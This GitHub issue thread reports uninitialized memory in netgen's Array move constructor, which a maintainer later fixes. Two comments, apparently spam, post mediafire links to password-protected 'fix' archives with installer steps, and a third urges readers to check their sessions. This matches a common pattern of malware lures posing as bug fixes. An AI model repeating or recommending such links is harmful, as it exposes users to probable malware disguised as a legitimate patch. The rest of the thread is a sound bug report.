### ISSUE TITLE
Uninitialized memory used in `Array` move constructor

### ISSUE THREAD

**Issue by roystgnr** [NGSolve/netgen#188]
Running a build with `clang++ -fsanitize=integer` catches this on my system as

```
runtime error: unsigned integer overflow: 32 * 14601116322895385600 cannot be represented in type 'unsigned long'
```

but looking at it with a debugger it's clear that the root problem is that 14 quintillion coming out of uninitialized memory.  In https://github.com/NGSolve/netgen/blob/2e3264ec6967f56239e634646d120f0b15e9971a/libsrc/core/array.hpp#L734-L736 we're in a constructor, at a point where `this->allocsize` hasn't yet been initialized, but we're doing arithmetic on it and handing the result off to `MemoryTracer::swap()` to use regardless.

I think in my case I end up eventually hitting `if (!mem_tracing_enabled)` in `PajeTrace::AllocMemory` and `PajeTrace::FreeMemory`, exiting the `MemoryTracer` *before* it can try to allocate or free a few hundred exabytes, but others might have a bigger problem here than "my checks don't run clean with a sanitizer on".

I think `allocsize(0)` in an initializer list might be the only fix needed here; it's at least enough to get my unit test suite past the failure.  I'll put up a PR shortly.

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HarbingerOfFire** [comment]
Check your signed in sessions for unknown people

**Comment by ChrLackner** [comment]
fixed in https://github.com/NGSolve/netgen/commit/69f2ea5635e3a6dfcb51015cd8bc52aca205998f
